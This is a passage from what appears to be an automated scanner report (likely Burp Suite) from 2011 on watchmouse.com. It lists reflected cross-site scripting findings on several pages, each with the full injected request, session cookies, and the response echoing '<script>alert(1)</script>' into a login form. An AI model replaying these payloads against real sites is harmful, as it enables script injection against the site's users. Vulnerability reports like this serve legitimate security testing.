Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-11bfdfda5b05c993c30ea6dff564b394"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/customers.php7ddd0"><script>alert(1)</script>ed307c79623" method="post">
...[SNIP]...

1.102. http://www.watchmouse.com/en/customers.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/customers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1966a"><script>alert(1)</script>2b96432b910 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/customers.php?1966a"><script>alert(1)</script>2b96432b910=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-3873c08ccf8d7ade8ffe865e0fc8e8ec"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/customers.php?1966a"><script>alert(1)</script>2b96432b910=1" method="post">
...[SNIP]...

1.103. http://www.watchmouse.com/en/dnstool.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/dnstool.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9592d"><script>alert(1)</script>b63bab14314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en9592d"><script>alert(1)</script>b63bab14314/dnstool.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-073bf9c9d846f8c7af3b8c97baa303d5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en9592d"><script>alert(1)</script>b63bab14314/dnstool.php" method="post">
...[SNIP]...

1.104. http://www.watchmouse.com/en/dnstool.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/dnstool.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4b5"><script>alert(1)</script>24304328954 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/dnstool.php6f4b5"><script>alert(1)</script>24304328954 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-1925403abb8e671cf92d9c02a293d684"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/dnstool.php6f4b5"><script>alert(1)</script>24304328954" method="post">
...[SNIP]...

1.105. http://www.watchmouse.com/en/dnstool.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/dnstool.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e54b0"><script>alert(1)</script>735acd9f680 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/dnstool.php?e54b0"><script>alert(1)</script>735acd9f680=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-4922853b270660a6dc0653474470f570"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/dnstool.php?e54b0"><script>alert(1)</script>735acd9f680=1" method="post">
...[SNIP]...

1.106. http://www.watchmouse.com/en/extensions.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/extensions.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3535"><script>alert(1)</script>0785e62a94a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ena3535"><script>alert(1)</script>0785e62a94a/extensions.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e3c1b9c4b1a76d36deb29788a3f24809"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ena3535"><script>alert(1)</script>0785e62a94a/extensions.php" method="post">
...[SNIP]...

1.107. http://www.watchmouse.com/en/extensions.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/extensions.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 918c7"><script>alert(1)</script>80019ed55a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/extensions.php918c7"><script>alert(1)</script>80019ed55a2 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-cf661187c540e58bcd8c1549a56a86d6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/extensions.php918c7"><script>alert(1)</script>80019ed55a2" method="post">
...[SNIP]...

1.108. http://www.watchmouse.com/en/extensions.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/extensions.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c17c4"><script>alert(1)</script>6b0c72a87db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/extensions.php?c17c4"><script>alert(1)</script>6b0c72a87db=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2d64b4c2844e5fe15aa9d4a34853a4a5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/extensions.php?c17c4"><script>alert(1)</script>6b0c72a87db=1" method="post">
...[SNIP]...

1.109. http://www.watchmouse.com/en/fact_sheet.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/fact_sheet.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2907c"><script>alert(1)</script>72bd7cc1f73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en2907c"><script>alert(1)</script>72bd7cc1f73/fact_sheet.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-51669068dd7c82ba7a3d2baea93931fd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en2907c"><script>alert(1)</script>72bd7cc1f73/fact_sheet.php" method="post">
...[SNIP]...

1.110. http://www.watchmouse.com/en/fact_sheet.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/fact_sheet.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ec8b"><script>alert(1)</script>9f4bc5d9602 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/fact_sheet.php7ec8b"><script>alert(1)</script>9f4bc5d9602 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a1c8f0cdfa54a7b41d8ffd2a043b6d3b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fact_sheet.php7ec8b"><script>alert(1)</script>9f4bc5d9602" method="post">
...[SNIP]...

1.111. http://www.watchmouse.com/en/fact_sheet.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/fact_sheet.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7cf0"><script>alert(1)</script>4f05880185b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/fact_sheet.php?d7cf0"><script>alert(1)</script>4f05880185b=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0d08ba2ec4ba7ab2a39cf841937838d2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fact_sheet.php?d7cf0"><script>alert(1)</script>4f05880185b=1" method="post">
...[SNIP]...

1.112. http://www.watchmouse.com/en/faq.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/faq.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93a35"><script>alert(1)</script>18eb829f328 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en93a35"><script>alert(1)</script>18eb829f328/faq.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-ad9b0f0a23b1abe07f544e8b8a9c62ac"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en93a35"><script>alert(1)</script>18eb829f328/faq.php" method="post">
...[SNIP]...

1.113. http://www.watchmouse.com/en/faq.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/faq.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164ff"><script>alert(1)</script>38a62c2deed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/faq.php164ff"><script>alert(1)</script>38a62c2deed HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-241840722d5252f261c6e7d81b15c4bd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/faq.php164ff"><script>alert(1)</script>38a62c2deed" method="post">
...[SNIP]...

1.114. http://www.watchmouse.com/en/faq.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8686e"><script>alert(1)</script>1bf3b04d33c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/faq.php?8686e"><script>alert(1)</script>1bf3b04d33c=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:06 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-cb2b491aea069184ee4baf2e11402502"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/faq.php?8686e"><script>alert(1)</script>1bf3b04d33c=1" method="post">
...[SNIP]...

1.115. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/api-and-web-services-cloud-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 487ba"><script>alert(1)</script>c0c36788f3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en487ba"><script>alert(1)</script>c0c36788f3f/feature/api-and-web-services-cloud-monitoring.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:50 GMT
